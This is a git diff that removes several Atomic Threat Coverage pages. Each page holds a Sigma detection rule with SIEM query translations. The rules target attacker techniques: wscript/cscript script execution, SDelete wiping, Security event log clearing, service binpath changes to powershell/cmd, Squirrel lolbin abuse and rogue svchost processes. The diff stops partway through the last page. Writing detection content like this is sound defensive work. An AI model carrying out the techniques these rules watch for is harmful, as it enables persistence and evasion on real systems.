-| Other Tags           | <ul><li>attack.t1059.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WSF/JSE/JS/VBA/VBE File Execution
-id: 1e33157c-53b1-41ad-bbcc-780b80b58288
-status: experimental
-description: Detects suspicious file execution by wscript and cscript
-author: Michael Haag
-date: 2019/01/16
-tags:
-    - attack.execution
-    - attack.t1064
-    - attack.t1059.005
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\wscript.exe'
-            - '\cscript.exe'
-        CommandLine|contains:
-            - '.jse'
-            - '.vbe'
-            - '.js'
-            - '.vba'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy.
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\wscript.exe" -or $_.message -match "Image.*.*\\cscript.exe") -and ($_.message -match "CommandLine.*.*.jse.*" -or $_.message -match "CommandLine.*.*.vbe.*" -or $_.message -match "CommandLine.*.*.js.*" -or $_.message -match "CommandLine.*.*.vba.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\wscript.exe OR *\\cscript.exe) AND winlog.event_data.CommandLine.keyword:(*.jse* OR *.vbe* OR *.js* OR *.vba*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1e33157c-53b1-41ad-bbcc-780b80b58288 <<EOF
-{
-  "metadata": {
-    "title": "WSF/JSE/JS/VBA/VBE File Execution",
-    "description": "Detects suspicious file execution by wscript and cscript",
-    "tags": [
-      "attack.execution",
-      "attack.t1064",
-      "attack.t1059.005"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\wscript.exe OR *\\\\cscript.exe) AND winlog.event_data.CommandLine.keyword:(*.jse* OR *.vbe* OR *.js* OR *.vba*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\wscript.exe OR *\\\\cscript.exe) AND winlog.event_data.CommandLine.keyword:(*.jse* OR *.vbe* OR *.js* OR *.vba*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WSF/JSE/JS/VBA/VBE File Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\wscript.exe *\\cscript.exe) AND CommandLine.keyword:(*.jse* *.vbe* *.js* *.vba*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\wscript.exe" OR Image="*\\cscript.exe") (CommandLine="*.jse*" OR CommandLine="*.vbe*" OR CommandLine="*.js*" OR CommandLine="*.vba*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\wscript.exe", "*\\cscript.exe"] CommandLine IN ["*.jse*", "*.vbe*", "*.js*", "*.vba*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\wscript\.exe|.*.*\cscript\.exe))(?=.*(?:.*.*\.jse.*|.*.*\.vbe.*|.*.*\.js.*|.*.*\.vba.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_sdelete.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_sdelete.md
deleted file mode 100644
index 24e0cf8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_sdelete.md
+++ /dev/null
@@ -1,188 +0,0 @@
-| Title                    | Secure Deletion with SDelete       |
-|:-------------------------|:------------------|
-| **Description**          | Detects renaming of file while deletion with SDelete tool |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1107: File Deletion](https://attack.mitre.org/techniques/T1107)</li><li>[T1066: Indicator Removal from Tools](https://attack.mitre.org/techniques/T1066)</li><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitime usage of SDelete</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://jpcertcc.github.io/ToolAnalysisResultSheet](https://jpcertcc.github.io/ToolAnalysisResultSheet)</li><li>[https://www.jpcert.or.jp/english/pub/sr/ir_research.html](https://www.jpcert.or.jp/english/pub/sr/ir_research.html)</li><li>[https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx](https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.s0195</li><li>attack.t1551.004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Secure Deletion with SDelete
-id: 39a80702-d7ca-4a83-b776-525b1f86a36d
-status: experimental
-description: Detects renaming of file while deletion with SDelete tool
-author: Thomas Patzke
-date: 2017/06/14
-references:
-    - https://jpcertcc.github.io/ToolAnalysisResultSheet
-    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
-    - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx
-tags:
-    - attack.defense_evasion
-    - attack.t1107
-    - attack.t1066
-    - attack.s0195
-    - attack.t1551.004
-    - attack.t1027
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 4656
-            - 4663
-            - 4658
-        ObjectName:
-            - '*.AAA'
-            - '*.ZZZ'
-    condition: selection
-falsepositives:
-    - Legitime usage of SDelete
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4656" -or $_.ID -eq "4663" -or $_.ID -eq "4658") -and ($_.message -match "ObjectName.*.*.AAA" -or $_.message -match "ObjectName.*.*.ZZZ")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("4656" OR "4663" OR "4658") AND winlog.event_data.ObjectName.keyword:(*.AAA OR *.ZZZ))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/39a80702-d7ca-4a83-b776-525b1f86a36d <<EOF
-{
-  "metadata": {
-    "title": "Secure Deletion with SDelete",
-    "description": "Detects renaming of file while deletion with SDelete tool",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1107",
-      "attack.t1066",
-      "attack.s0195",
-      "attack.t1551.004",
-      "attack.t1027"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4656\" OR \"4663\" OR \"4658\") AND winlog.event_data.ObjectName.keyword:(*.AAA OR *.ZZZ))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4656\" OR \"4663\" OR \"4658\") AND winlog.event_data.ObjectName.keyword:(*.AAA OR *.ZZZ))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Secure Deletion with SDelete'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("4656" "4663" "4658") AND ObjectName.keyword:(*.AAA *.ZZZ))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4656" OR EventCode="4663" OR EventCode="4658") (ObjectName="*.AAA" OR ObjectName="*.ZZZ"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["4656", "4663", "4658"] ObjectName IN ["*.AAA", "*.ZZZ"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*4656|.*4663|.*4658))(?=.*(?:.*.*\.AAA|.*.*\.ZZZ)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_security_eventlog_cleared.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_security_eventlog_cleared.md
deleted file mode 100644
index 38bb472..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_security_eventlog_cleared.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Security Eventlog Cleared       |
-|:-------------------------|:------------------|
-| **Description**          | Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li><li>[T1551: None](https://attack.mitre.org/techniques/T1551)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1551: None](../Triggers/T1551.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)</li><li>System provisioning (system reset before the golden image creation)</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2016-04-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Security Eventlog Cleared
-id: f2f01843-e7b8-4f95-a35a-d23584476423
-description: Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities
-tags:
-    - attack.defense_evasion
-    - attack.t1070
-    - car.2016-04-002
-    - attack.t1551
-author: Florian Roth
-date: 2017/02/19
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 517
-            - 1102
-    condition: selection
-falsepositives:
-    - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)
-    - System provisioning (system reset before the golden image creation)
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "517" -or $_.ID -eq "1102")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("517" OR "1102"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f2f01843-e7b8-4f95-a35a-d23584476423 <<EOF
-{
-  "metadata": {
-    "title": "Security Eventlog Cleared",
-    "description": "Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1070",
-      "car.2016-04-002",
-      "attack.t1551"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"517\" OR \"1102\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"517\" OR \"1102\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Security Eventlog Cleared'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:("517" "1102")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="517" OR EventCode="1102"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["517", "1102"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*517|.*1102)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_service_path_modification.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_service_path_modification.md
deleted file mode 100644
index 6a9aa80..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_service_path_modification.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Suspicious Service Path Modification       |
-|:-------------------------|:------------------|
-| **Description**          | Detects service path modification to powershell/cmd |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1031: Modify Existing Service](https://attack.mitre.org/techniques/T1031)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1031/T1031.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1031/T1031.yaml)</li></ul>  |
-| **Author**               | Victor Sergeev, oscd.community |
-| Other Tags           | <ul><li>attack.t1543.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Service Path Modification
-id: 138d3531-8793-4f50-a2cd-f291b2863d78
-description: Detects service path modification to powershell/cmd
-status: experimental
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1031/T1031.yaml
-tags:
-    - attack.persistence
-    - attack.t1031
-    - attack.t1543.003
-date: 2019/10/21
-modified: 2019/11/10
-author: Victor Sergeev, oscd.community
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_1:
-        Image|endswith: '\sc.exe'
-        CommandLine|contains|all:
-            - 'config'
-            - 'binpath'
-    selection_2:
-        CommandLine|contains:
-            - 'powershell'
-            - 'cmd'
-    condition: selection_1 and selection_2
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\sc.exe" -and $_.message -match "CommandLine.*.*config.*" -and $_.message -match "CommandLine.*.*binpath.*" -and ($_.message -match "CommandLine.*.*powershell.*" -or $_.message -match "CommandLine.*.*cmd.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\sc.exe AND winlog.event_data.CommandLine.keyword:*config* AND winlog.event_data.CommandLine.keyword:*binpath* AND winlog.event_data.CommandLine.keyword:(*powershell* OR *cmd*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/138d3531-8793-4f50-a2cd-f291b2863d78 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Service Path Modification",
-    "description": "Detects service path modification to powershell/cmd",
-    "tags": [
-      "attack.persistence",
-      "attack.t1031",
-      "attack.t1543.003"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\sc.exe AND winlog.event_data.CommandLine.keyword:*config* AND winlog.event_data.CommandLine.keyword:*binpath* AND winlog.event_data.CommandLine.keyword:(*powershell* OR *cmd*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\sc.exe AND winlog.event_data.CommandLine.keyword:*config* AND winlog.event_data.CommandLine.keyword:*binpath* AND winlog.event_data.CommandLine.keyword:(*powershell* OR *cmd*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Service Path Modification'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\sc.exe AND CommandLine.keyword:*config* AND CommandLine.keyword:*binpath* AND CommandLine.keyword:(*powershell* *cmd*))
-```
-
-
-### splunk
-    
-```
-(Image="*\\sc.exe" CommandLine="*config*" CommandLine="*binpath*" (CommandLine="*powershell*" OR CommandLine="*cmd*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\sc.exe" CommandLine="*config*" CommandLine="*binpath*" CommandLine IN ["*powershell*", "*cmd*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\sc\.exe)(?=.*.*config.*)(?=.*.*binpath.*)(?=.*(?:.*.*powershell.*|.*.*cmd.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_squirrel_lolbin.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_squirrel_lolbin.md
deleted file mode 100644
index 3aa4cfa..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_squirrel_lolbin.md
+++ /dev/null
@@ -1,207 +0,0 @@
-| Title                    | Squirrel Lolbin       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Possible Squirrel Packages Manager as Lolbin |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>1Clipboard</li><li>Beaker Browser</li><li>Caret</li><li>Collectie</li><li>Discord</li><li>Figma</li><li>Flow</li><li>Ghost</li><li>GitHub Desktop</li><li>GitKraken</li><li>Hyper</li><li>Insomnia</li><li>JIBO</li><li>Kap</li><li>Kitematic</li><li>Now Desktop</li><li>Postman</li><li>PostmanCanary</li><li>Rambox</li><li>Simplenote</li><li>Skype</li><li>Slack</li><li>SourceTree</li><li>Stride</li><li>Svgsus</li><li>WebTorrent</li><li>WhatsApp</li><li>WordPress.com</li><li>atom</li><li>gitkraken</li><li>slack</li><li>teams</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/](http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/)</li><li>[http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/](http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/)</li></ul>  |
-| **Author**               | Karneades / Markus Neis |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Squirrel Lolbin
-id: fa4b21c9-0057-4493-b289-2556416ae4d7
-status: experimental
-description: Detects Possible Squirrel Packages Manager as Lolbin
-references:
-    - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/
-    - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
-tags:
-    - attack.execution
-author: Karneades / Markus Neis
-date: 2019/11/12
-falsepositives:
-    - 1Clipboard
-    - Beaker Browser
-    - Caret
-    - Collectie
-    - Discord
-    - Figma
-    - Flow
-    - Ghost
-    - GitHub Desktop
-    - GitKraken
-    - Hyper
-    - Insomnia
-    - JIBO
-    - Kap
-    - Kitematic
-    - Now Desktop
-    - Postman
-    - PostmanCanary
-    - Rambox
-    - Simplenote
-    - Skype
-    - Slack
-    - SourceTree
-    - Stride
-    - Svgsus
-    - WebTorrent
-    - WhatsApp
-    - WordPress.com
-    - atom
-    - gitkraken
-    - slack
-    - teams
-level: high
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\update.exe'                           # Check if folder Name matches executed binary  \\(?P<first>[^\\]*)\\Update.*Start.{2}(?P<second>\1)\.exe (example: https://regex101.com/r/SGSQGz/2)
-        CommandLine:
-            - '*--processStart*.exe*'
-            - '*--processStartAndWait*.exe*'
-            - '*--createShortcut*.exe*'
-    condition: selection
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\update.exe") -and ($_.message -match "CommandLine.*.*--processStart.*.exe.*" -or $_.message -match "CommandLine.*.*--processStartAndWait.*.exe.*" -or $_.message -match "CommandLine.*.*--createShortcut.*.exe.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\update.exe) AND winlog.event_data.CommandLine.keyword:(*\-\-processStart*.exe* OR *\-\-processStartAndWait*.exe* OR *\-\-createShortcut*.exe*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fa4b21c9-0057-4493-b289-2556416ae4d7 <<EOF
-{
-  "metadata": {
-    "title": "Squirrel Lolbin",
-    "description": "Detects Possible Squirrel Packages Manager as Lolbin",
-    "tags": [
-      "attack.execution"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\update.exe) AND winlog.event_data.CommandLine.keyword:(*\\-\\-processStart*.exe* OR *\\-\\-processStartAndWait*.exe* OR *\\-\\-createShortcut*.exe*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\update.exe) AND winlog.event_data.CommandLine.keyword:(*\\-\\-processStart*.exe* OR *\\-\\-processStartAndWait*.exe* OR *\\-\\-createShortcut*.exe*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Squirrel Lolbin'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\update.exe) AND CommandLine.keyword:(*\-\-processStart*.exe* *\-\-processStartAndWait*.exe* *\-\-createShortcut*.exe*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\update.exe") (CommandLine="*--processStart*.exe*" OR CommandLine="*--processStartAndWait*.exe*" OR CommandLine="*--createShortcut*.exe*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\update.exe"] CommandLine IN ["*--processStart*.exe*", "*--processStartAndWait*.exe*", "*--createShortcut*.exe*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\update\.exe))(?=.*(?:.*.*--processStart.*\.exe.*|.*.*--processStartAndWait.*\.exe.*|.*.*--createShortcut.*\.exe.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost.md
deleted file mode 100644
index fe7b617..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Suspicious Svchost Process       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious svchost process start |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Svchost Process
-id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d
-status: experimental
-description: Detects a suspicious svchost process start
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-author: Florian Roth
-date: 2017/08/15
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\svchost.exe'
-    filter:
-        ParentImage:
-            - '*\services.exe'
-            - '*\MsMpEng.exe'
-            - '*\Mrt.exe'
-            - '*\rpcnet.exe'
-            - '*\svchost.exe'
-    filter_null:
-        ParentImage: null
-    condition: selection and not filter and not filter_null
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
